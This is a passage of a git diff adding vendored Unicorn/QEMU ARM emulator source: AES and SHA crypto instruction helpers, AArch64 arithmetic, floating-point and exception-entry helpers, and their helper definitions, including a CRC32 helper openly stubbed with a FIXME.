0x2ff69117, + 0x8dd64d76, 0x86db4478, 0x9bcc5f6a, 
0x90c15664, + 0xa1e2694e, 0xaaef6040, 0xb7f87b52, 0xbcf5725c, + 0xd5be0506, 0xdeb30c08, 0xc3a4171a, 0xc8a91e14, + 0xf98a213e, 0xf2872830, 0xef903322, 0xe49d3a2c, + 0x3d06dd96, 0x360bd498, 0x2b1ccf8a, 0x2011c684, + 0x1132f9ae, 0x1a3ff0a0, 0x0728ebb2, 0x0c25e2bc, + 0x656e95e6, 0x6e639ce8, 0x737487fa, 0x78798ef4, + 0x495ab1de, 0x4257b8d0, 0x5f40a3c2, 0x544daacc, + 0xf7daec41, 0xfcd7e54f, 0xe1c0fe5d, 0xeacdf753, + 0xdbeec879, 0xd0e3c177, 0xcdf4da65, 0xc6f9d36b, + 0xafb2a431, 0xa4bfad3f, 0xb9a8b62d, 0xb2a5bf23, + 0x83868009, 0x888b8907, 0x959c9215, 0x9e919b1b, + 0x470a7ca1, 0x4c0775af, 0x51106ebd, 0x5a1d67b3, + 0x6b3e5899, 0x60335197, 0x7d244a85, 0x7629438b, + 0x1f6234d1, 0x146f3ddf, 0x097826cd, 0x02752fc3, + 0x335610e9, 0x385b19e7, 0x254c02f5, 0x2e410bfb, + 0x8c61d79a, 0x876cde94, 0x9a7bc586, 0x9176cc88, + 0xa055f3a2, 0xab58faac, 0xb64fe1be, 0xbd42e8b0, + 0xd4099fea, 0xdf0496e4, 0xc2138df6, 0xc91e84f8, + 0xf83dbbd2, 0xf330b2dc, 0xee27a9ce, 0xe52aa0c0, + 0x3cb1477a, 0x37bc4e74, 0x2aab5566, 0x21a65c68, + 0x10856342, 0x1b886a4c, 0x069f715e, 0x0d927850, + 0x64d90f0a, 0x6fd40604, 0x72c31d16, 0x79ce1418, + 0x48ed2b32, 0x43e0223c, 0x5ef7392e, 0x55fa3020, + 0x01b79aec, 0x0aba93e2, 0x17ad88f0, 0x1ca081fe, + 0x2d83bed4, 0x268eb7da, 0x3b99acc8, 0x3094a5c6, + 0x59dfd29c, 0x52d2db92, 0x4fc5c080, 0x44c8c98e, + 0x75ebf6a4, 0x7ee6ffaa, 0x63f1e4b8, 0x68fcedb6, + 0xb1670a0c, 0xba6a0302, 0xa77d1810, 0xac70111e, + 0x9d532e34, 0x965e273a, 0x8b493c28, 0x80443526, + 0xe90f427c, 0xe2024b72, 0xff155060, 0xf418596e, + 0xc53b6644, 0xce366f4a, 0xd3217458, 0xd82c7d56, + 0x7a0ca137, 0x7101a839, 0x6c16b32b, 0x671bba25, + 0x5638850f, 0x5d358c01, 0x40229713, 0x4b2f9e1d, + 0x2264e947, 0x2969e049, 0x347efb5b, 0x3f73f255, + 0x0e50cd7f, 0x055dc471, 0x184adf63, 0x1347d66d, + 0xcadc31d7, 0xc1d138d9, 0xdcc623cb, 0xd7cb2ac5, + 0xe6e815ef, 0xede51ce1, 0xf0f207f3, 0xfbff0efd, + 0x92b479a7, 0x99b970a9, 0x84ae6bbb, 0x8fa362b5, + 0xbe805d9f, 0xb58d5491, 0xa89a4f83, 0xa397468d, + } }; + union CRYPTO_STATE st; + int 
i; + st.l[0] = float64_val(env->vfp.regs[rm]); + st.l[1] = float64_val(env->vfp.regs[rm + 1]); + + assert(decrypt < 2); + + for (i = 0; i < 16; i += 4) { + st.words[i >> 2] = cpu_to_le32( + mc[decrypt][st.bytes[i]] ^ + rol32(mc[decrypt][st.bytes[i + 1]], 8) ^ + rol32(mc[decrypt][st.bytes[i + 2]], 16) ^ + rol32(mc[decrypt][st.bytes[i + 3]], 24)); + } + + env->vfp.regs[rd] = make_float64(st.l[0]); + env->vfp.regs[rd + 1] = make_float64(st.l[1]); +} + +/* + * SHA-1 logical functions + */ + +static uint32_t cho(uint32_t x, uint32_t y, uint32_t z) +{ + return (x & (y ^ z)) ^ z; +} + +static uint32_t par(uint32_t x, uint32_t y, uint32_t z) +{ + return x ^ y ^ z; +} + +static uint32_t maj(uint32_t x, uint32_t y, uint32_t z) +{ + return (x & y) | ((x | y) & z); +} + +void HELPER(crypto_sha1_3reg)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm, uint32_t op) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + if (op == 3) { /* sha1su0 */ + d.l[0] ^= d.l[1] ^ m.l[0]; + d.l[1] ^= n.l[0] ^ m.l[1]; + } else { + int i; + + for (i = 0; i < 4; i++) { + uint32_t t; + + switch (op) { + case 0: /* sha1c */ + t = cho(d.words[1], d.words[2], d.words[3]); + break; + case 1: /* sha1p */ + t = par(d.words[1], d.words[2], d.words[3]); + break; + case 2: /* sha1m */ + t = maj(d.words[1], d.words[2], d.words[3]); + break; + default: + g_assert_not_reached(); + } + t += rol32(d.words[0], 5) + n.words[0] + m.words[i]; + + n.words[0] = d.words[3]; + d.words[3] = d.words[2]; + d.words[2] = ror32(d.words[1], 2); + d.words[1] = d.words[0]; + d.words[0] = t; + } + } + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void 
HELPER(crypto_sha1h)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE m; + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + m.words[0] = ror32(m.words[0], 2); + m.words[1] = m.words[2] = m.words[3] = 0; + + env->vfp.regs[rd] = make_float64(m.l[0]); + env->vfp.regs[rd + 1] = make_float64(m.l[1]); +} + +void HELPER(crypto_sha1su1)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] = rol32(d.words[0] ^ m.words[1], 1); + d.words[1] = rol32(d.words[1] ^ m.words[2], 1); + d.words[2] = rol32(d.words[2] ^ m.words[3], 1); + d.words[3] = rol32(d.words[3] ^ d.words[0], 1); + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +/* + * The SHA-256 logical functions, according to + * http://csrc.nist.gov/groups/STM/cavp/documents/shs/sha256-384-512.pdf + */ + +static uint32_t S0(uint32_t x) +{ + return ror32(x, 2) ^ ror32(x, 13) ^ ror32(x, 22); +} + +static uint32_t S1(uint32_t x) +{ + return ror32(x, 6) ^ ror32(x, 11) ^ ror32(x, 25); +} + +static uint32_t s0(uint32_t x) +{ + return ror32(x, 7) ^ ror32(x, 18) ^ (x >> 3); +} + +static uint32_t s1(uint32_t x) +{ + return ror32(x, 17) ^ ror32(x, 19) ^ (x >> 10); +} + +void HELPER(crypto_sha256h)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + int i; + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + for (i = 0; i < 4; i++) { + uint32_t t = cho(n.words[0], n.words[1], n.words[2]) + 
n.words[3] + + S1(n.words[0]) + m.words[i]; + + n.words[3] = n.words[2]; + n.words[2] = n.words[1]; + n.words[1] = n.words[0]; + n.words[0] = d.words[3] + t; + + t += maj(d.words[0], d.words[1], d.words[2]) + S0(d.words[0]); + + d.words[3] = d.words[2]; + d.words[2] = d.words[1]; + d.words[1] = d.words[0]; + d.words[0] = t; + } + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256h2)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + int i; + + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + for (i = 0; i < 4; i++) { + uint32_t t = cho(d.words[0], d.words[1], d.words[2]) + d.words[3] + + S1(d.words[0]) + m.words[i]; + + d.words[3] = d.words[2]; + d.words[2] = d.words[1]; + d.words[1] = d.words[0]; + d.words[0] = n.words[3 - i] + t; + } + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256su0)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] += s0(d.words[1]); + d.words[1] += s0(d.words[2]); + d.words[2] += s0(d.words[3]); + d.words[3] += s0(m.words[0]); + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256su1)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = 
float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] += s1(m.words[2]) + n.words[1]; + d.words[1] += s1(m.words[3]) + n.words[2]; + d.words[2] += s1(d.words[0]) + n.words[3]; + d.words[3] += s1(d.words[1]) + m.words[0]; + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c new file mode 100644 index 0000000..1d976c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c @@ -0,0 +1,528 @@ +/* + * AArch64 specific helpers + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/host-utils.h" +#include "sysemu/sysemu.h" +#include "qemu/bitops.h" +#include "internals.h" +#include "qemu/crc32c.h" + +/* C2.4.7 Multiply and divide */ +/* special cases for 0 and LLONG_MIN are mandated by the standard */ +uint64_t HELPER(udiv64)(uint64_t num, uint64_t den) +{ + if (den == 0) { + return 0; + } + return num / den; +} + +int64_t HELPER(sdiv64)(int64_t num, int64_t den) +{ + if (den == 0) { + return 0; + } + if (num == LLONG_MIN && den == -1) { + return LLONG_MIN; + } + return num / den; +} + +uint64_t HELPER(clz64)(uint64_t x) +{ + return clz64(x); +} + +uint64_t HELPER(cls64)(uint64_t x) +{ + return clrsb64(x); +} + +uint32_t HELPER(cls32)(uint32_t x) +{ + return clrsb32(x); +} + +uint32_t HELPER(clz32)(uint32_t x) +{ + return clz32(x); +} + +uint64_t HELPER(rbit64)(uint64_t x) +{ + /* assign the correct byte position */ + x = bswap64(x); + + /* assign the correct nibble position */ + x = ((x & 0xf0f0f0f0f0f0f0f0ULL) >> 4) + | ((x & 0x0f0f0f0f0f0f0f0fULL) << 4); + + /* assign the correct bit position */ + x = ((x & 0x8888888888888888ULL) >> 3) + | ((x & 0x4444444444444444ULL) >> 1) + | ((x & 0x2222222222222222ULL) << 1) + | ((x & 0x1111111111111111ULL) << 3); + + return x; +} + +/* Convert a softfloat float_relation_ (as returned by + * the float*_compare functions) to the correct ARM + * NZCV flag state. 
+ */ +static inline uint32_t float_rel_to_flags(int res) +{ + uint64_t flags; + switch (res) { + case float_relation_equal: + flags = PSTATE_Z | PSTATE_C; + break; + case float_relation_less: + flags = PSTATE_N; + break; + case float_relation_greater: + flags = PSTATE_C; + break; + case float_relation_unordered: + default: + flags = PSTATE_C | PSTATE_V; + break; + } + return flags; +} + +uint64_t HELPER(vfp_cmps_a64)(float32 x, float32 y, void *fp_status) +{ + return float_rel_to_flags(float32_compare_quiet(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmpes_a64)(float32 x, float32 y, void *fp_status) +{ + return float_rel_to_flags(float32_compare(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmpd_a64)(float64 x, float64 y, void *fp_status) +{ + return float_rel_to_flags(float64_compare_quiet(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmped_a64)(float64 x, float64 y, void *fp_status) +{ + return float_rel_to_flags(float64_compare(x, y, fp_status)); +} + +float32 HELPER(vfp_mulxs)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + if ((float32_is_zero(a) && float32_is_infinity(b)) || + (float32_is_infinity(a) && float32_is_zero(b))) { + /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ + return make_float32((1U << 30) | + ((float32_val(a) ^ float32_val(b)) & (1U << 31))); + } + return float32_mul(a, b, fpst); +} + +float64 HELPER(vfp_mulxd)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + if ((float64_is_zero(a) && float64_is_infinity(b)) || + (float64_is_infinity(a) && float64_is_zero(b))) { + /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ + return make_float64((1ULL << 62) | + ((float64_val(a) ^ float64_val(b)) & (1ULL << 63))); + } + return float64_mul(a, b, fpst); +} + +uint64_t HELPER(simd_tbl)(CPUARMState *env, uint64_t result, uint64_t indices, + uint32_t rn, uint32_t numregs) +{ + /* Helper function for SIMD TBL and TBX. 
We have to do the table + * lookup part for the 64 bits worth of indices we're passed in. + * result is the initial results vector (either zeroes for TBL + * or some guest values for TBX), rn the register number where + * the table starts, and numregs the number of registers in the table. + * We return the results of the lookups. + */ + int shift; + + for (shift = 0; shift < 64; shift += 8) { + int index = extract64(indices, shift, 8); + if (index < 16 * numregs) { + /* Convert index (a byte offset into the virtual table + * which is a series of 128-bit vectors concatenated) + * into the correct vfp.regs[] element plus a bit offset + * into that element, bearing in mind that the table + * can wrap around from V31 to V0. + */ + int elt = (rn * 2 + (index >> 3)) % 64; + int bitidx = (index & 7) * 8; + uint64_t val = extract64(env->vfp.regs[elt], bitidx, 8); + + result = deposit64(result, shift, 8, val); + } + } + return result; +} + +/* 64bit/double versions of the neon float compare functions */ +uint64_t HELPER(neon_ceq_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_eq_quiet(a, b, fpst); +} + +uint64_t HELPER(neon_cge_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_le(b, a, fpst); +} + +uint64_t HELPER(neon_cgt_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_lt(b, a, fpst); +} + +/* Reciprocal step and sqrt step. Note that unlike the A32/T32 + * versions, these do a fully fused multiply-add or + * multiply-add-and-halve. 
+ */ +#define float32_two make_float32(0x40000000) +#define float32_three make_float32(0x40400000) +#define float32_one_point_five make_float32(0x3fc00000) + +#define float64_two make_float64(0x4000000000000000ULL) +#define float64_three make_float64(0x4008000000000000ULL) +#define float64_one_point_five make_float64(0x3FF8000000000000ULL) + +float32 HELPER(recpsf_f32)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float32_chs(a); + if ((float32_is_infinity(a) && float32_is_zero(b)) || + (float32_is_infinity(b) && float32_is_zero(a))) { + return float32_two; + } + return float32_muladd(a, b, float32_two, 0, fpst); +} + +float64 HELPER(recpsf_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float64_chs(a); + if ((float64_is_infinity(a) && float64_is_zero(b)) || + (float64_is_infinity(b) && float64_is_zero(a))) { + return float64_two; + } + return float64_muladd(a, b, float64_two, 0, fpst); +} + +float32 HELPER(rsqrtsf_f32)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float32_chs(a); + if ((float32_is_infinity(a) && float32_is_zero(b)) || + (float32_is_infinity(b) && float32_is_zero(a))) { + return float32_one_point_five; + } + return float32_muladd(a, b, float32_three, float_muladd_halve_result, fpst); +} + +float64 HELPER(rsqrtsf_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float64_chs(a); + if ((float64_is_infinity(a) && float64_is_zero(b)) || + (float64_is_infinity(b) && float64_is_zero(a))) { + return float64_one_point_five; + } + return float64_muladd(a, b, float64_three, float_muladd_halve_result, fpst); +} + +/* Pairwise long add: add pairs of adjacent elements into + * double-width elements in the result (eg _s8 is an 8x8->16 op) + */ +uint64_t HELPER(neon_addlp_s8)(uint64_t a) +{ + uint64_t nsignmask = 0x0080008000800080ULL; + uint64_t wsignmask = 0x8000800080008000ULL; + uint64_t elementmask = 0x00ff00ff00ff00ffULL; + uint64_t 
tmp1, tmp2; + uint64_t res, signres; + + /* Extract odd elements, sign extend each to a 16 bit field */ + tmp1 = a & elementmask; + tmp1 ^= nsignmask; + tmp1 |= wsignmask; + tmp1 = (tmp1 - nsignmask) ^ wsignmask; + /* Ditto for the even elements */ + tmp2 = (a >> 8) & elementmask; + tmp2 ^= nsignmask; + tmp2 |= wsignmask; + tmp2 = (tmp2 - nsignmask) ^ wsignmask; + + /* calculate the result by summing bits 0..14, 16..22, etc, + * and then adjusting the sign bits 15, 23, etc manually. + * This ensures the addition can't overflow the 16 bit field. + */ + signres = (tmp1 ^ tmp2) & wsignmask; + res = (tmp1 & ~wsignmask) + (tmp2 & ~wsignmask); + res ^= signres; + + return res; +} + +uint64_t HELPER(neon_addlp_u8)(uint64_t a) +{ + uint64_t tmp; + + tmp = a & 0x00ff00ff00ff00ffULL; + tmp += (a >> 8) & 0x00ff00ff00ff00ffULL; + return tmp; +} + +uint64_t HELPER(neon_addlp_s16)(uint64_t a) +{ + int32_t reslo, reshi; + + reslo = (int32_t)(int16_t)a + (int32_t)(int16_t)(a >> 16); + reshi = (int32_t)(int16_t)(a >> 32) + (int32_t)(int16_t)(a >> 48); + + return (uint32_t)reslo | (((uint64_t)reshi) << 32); +} + +uint64_t HELPER(neon_addlp_u16)(uint64_t a) +{ + uint64_t tmp; + + tmp = a & 0x0000ffff0000ffffULL; + tmp += (a >> 16) & 0x0000ffff0000ffffULL; + return tmp; +} + +/* Floating-point reciprocal exponent - see FPRecpX in ARM ARM */ +float32 HELPER(frecpx_f32)(float32 a, void *fpstp) +{ + float_status *fpst = fpstp; + uint32_t val32, sbit; + int32_t exp; + + if (float32_is_any_nan(a)) { + float32 nan = a; + if (float32_is_signaling_nan(a)) { + float_raise(float_flag_invalid, fpst); + nan = float32_maybe_silence_nan(a); + } + if (fpst->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } + + val32 = float32_val(a); + sbit = 0x80000000ULL & val32; + exp = extract32(val32, 23, 8); + + if (exp == 0) { + return make_float32(sbit | (0xfe << 23)); + } else { + return make_float32(sbit | (~exp & 0xff) << 23); + } +} + +float64 HELPER(frecpx_f64)(float64 a, void 
*fpstp) +{ + float_status *fpst = fpstp; + uint64_t val64, sbit; + int64_t exp; + + if (float64_is_any_nan(a)) { + float64 nan = a; + if (float64_is_signaling_nan(a)) { + float_raise(float_flag_invalid, fpst); + nan = float64_maybe_silence_nan(a); + } + if (fpst->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } + + val64 = float64_val(a); + sbit = 0x8000000000000000ULL & val64; + exp = extract64(float64_val(a), 52, 11); + + if (exp == 0) { + return make_float64(sbit | (0x7feULL << 52)); + } else { + return make_float64(sbit | (~exp & 0x7ffULL) << 52); + } +} + +float32 HELPER(fcvtx_f64_to_f32)(float64 a, CPUARMState *env) +{ + /* Von Neumann rounding is implemented by using round-to-zero + * and then setting the LSB of the result if Inexact was raised. + */ + float32 r; + float_status *fpst = &env->vfp.fp_status; + float_status tstat = *fpst; + int exflags; + + set_float_rounding_mode(float_round_to_zero, &tstat); + set_float_exception_flags(0, &tstat); + r = float64_to_float32(a, &tstat); + r = float32_maybe_silence_nan(r); + exflags = get_float_exception_flags(&tstat); + if (exflags & float_flag_inexact) { + r = make_float32(float32_val(r) | 1); + } + exflags |= get_float_exception_flags(fpst); + set_float_exception_flags(exflags, fpst); + return r; +} + +/* 64-bit versions of the CRC helpers. Note that although the operation + * (and the prototypes of crc32c() and crc32() mean that only the bottom + * 32 bits of the accumulator and result are used, we pass and return + * uint64_t for convenience of the generated code. Unlike the 32-bit + * instruction set versions, val may genuinely have 64 bits of data in it. + * The upper bytes of val (above the number specified by 'bytes') must have + * been zeroed out by the caller. + */ +uint64_t HELPER(crc32_64)(uint64_t acc, uint64_t val, uint32_t bytes) +{ + uint8_t buf[8]; + + stq_le_p(buf, val); + + /* zlib crc32 converts the accumulator and output to one's complement. 
*/ + // return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; + return 0; // FIXME +} + +uint64_t HELPER(crc32c_64)(uint64_t acc, uint64_t val, uint32_t bytes) +{ + uint8_t buf[8]; + + stq_le_p(buf, val); + + /* Linux crc32c converts the output to one's complement. */ + return crc32c(acc, buf, bytes) ^ 0xffffffff; +} + +#if !defined(CONFIG_USER_ONLY) + +/* Handle a CPU exception. */ +void aarch64_cpu_do_interrupt(CPUState *cs) +{ + CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, cs); + unsigned int new_el = arm_excp_target_el(cs, cs->exception_index); + target_ulong addr = env->cp15.vbar_el[new_el]; + unsigned int new_mode = aarch64_pstate_mode(new_el, true); + int i; + + if (arm_current_el(env) < new_el) { + if (env->aarch64) { + addr += 0x400; + } else { + addr += 0x600; + } + } else if (pstate_read(env) & PSTATE_SP) { + addr += 0x200; + } + + arm_log_exception(cs->exception_index); + qemu_log_mask(CPU_LOG_INT, "...from EL%d\n", arm_current_el(env)); + if (qemu_loglevel_mask(CPU_LOG_INT) + && !excp_is_internal(cs->exception_index)) { + qemu_log_mask(CPU_LOG_INT, "...with ESR 0x%" PRIx32 "\n", + env->exception.syndrome); + } + + if (arm_is_psci_call(cpu, cs->exception_index)) { + arm_handle_psci_call(cpu); + qemu_log_mask(CPU_LOG_INT, "...handled as PSCI call\n"); + return; + } + + switch (cs->exception_index) { + case EXCP_PREFETCH_ABORT: + case EXCP_DATA_ABORT: + env->cp15.far_el[new_el] = env->exception.vaddress; + qemu_log_mask(CPU_LOG_INT, "...with FAR 0x%" PRIx64 "\n", + env->cp15.far_el[new_el]); + /* fall through */ + case EXCP_BKPT: + case EXCP_UDEF: + case EXCP_SWI: + case EXCP_HVC: + case EXCP_HYP_TRAP: + case EXCP_SMC: + env->cp15.esr_el[new_el] = env->exception.syndrome; + break; + case EXCP_IRQ: + case EXCP_VIRQ: + addr += 0x80; + break; + case EXCP_FIQ: + case EXCP_VFIQ: + addr += 0x100; + break; + default: + cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); + } + + if (is_a64(env)) { + 
env->banked_spsr[aarch64_banked_spsr_index(new_el)] = pstate_read(env); + aarch64_save_sp(env, arm_current_el(env)); + env->elr_el[new_el] = env->pc; + } else { + env->banked_spsr[0] = cpsr_read(env); + if (!env->thumb) { + env->cp15.esr_el[new_el] |= 1 << 25; + } + env->elr_el[new_el] = env->regs[15]; + + for (i = 0; i < 15; i++) { + env->xregs[i] = env->regs[i]; + } + + env->condexec_bits = 0; + } + + pstate_write(env, PSTATE_DAIF | new_mode); + env->aarch64 = 1; + aarch64_restore_sp(env, new_el); + + env->pc = addr; + cs->interrupt_request |= CPU_INTERRUPT_EXITTB; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h new file mode 100644 index 0000000..1d3d10f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h @@ -0,0 +1,48 @@ +/* + * AArch64 specific helper definitions + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +DEF_HELPER_FLAGS_2(udiv64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(sdiv64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_1(clz64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(cls64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(cls32, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(clz32, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(rbit64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_3(vfp_cmps_a64, i64, f32, f32, ptr) +DEF_HELPER_3(vfp_cmpes_a64, i64, f32, f32, ptr) +DEF_HELPER_3(vfp_cmpd_a64, i64, f64, f64, ptr) +DEF_HELPER_3(vfp_cmped_a64, i64, f64, f64, ptr) +DEF_HELPER_FLAGS_5(simd_tbl, TCG_CALL_NO_RWG_SE, i64, env, i64, i64, i32, i32) +DEF_HELPER_FLAGS_3(vfp_mulxs, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(vfp_mulxd, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_3(neon_ceq_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(neon_cge_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(neon_cgt_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(recpsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(recpsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_3(rsqrtsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(rsqrtsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_1(neon_addlp_s8, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_u8, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_s16, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_u16, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_2(frecpx_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(frecpx_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(fcvtx_f64_to_f32, TCG_CALL_NO_RWG, f32, f64, env) +DEF_HELPER_FLAGS_3(crc32_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) +DEF_HELPER_FLAGS_3(crc32c_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c 
b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c new file mode 100644 index 0000000..8f65534 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c @@ -0,0 +1,5791 @@ +#include "cpu.h" +#include "internals.h" +#include "exec/helper-proto.h" +#include "qemu/host-utils.h" +#include "sysemu/sysemu.h" +#include "qemu/bitops.h" +#include "qemu/crc32c.h" +#include "exec/cpu_ldst.h" +#include "arm_ldst.h" + +#ifndef CONFIG_USER_ONLY +static inline int get_phys_addr(CPUARMState *env, target_ulong address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot, + target_ulong *page_size); + +/* Definitions for the PMCCNTR and PMCR registers */ +#define PMCRD 0x8 +#define PMCRC 0x4 +#define PMCRE 0x1 +#endif + +static uint64_t raw_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if 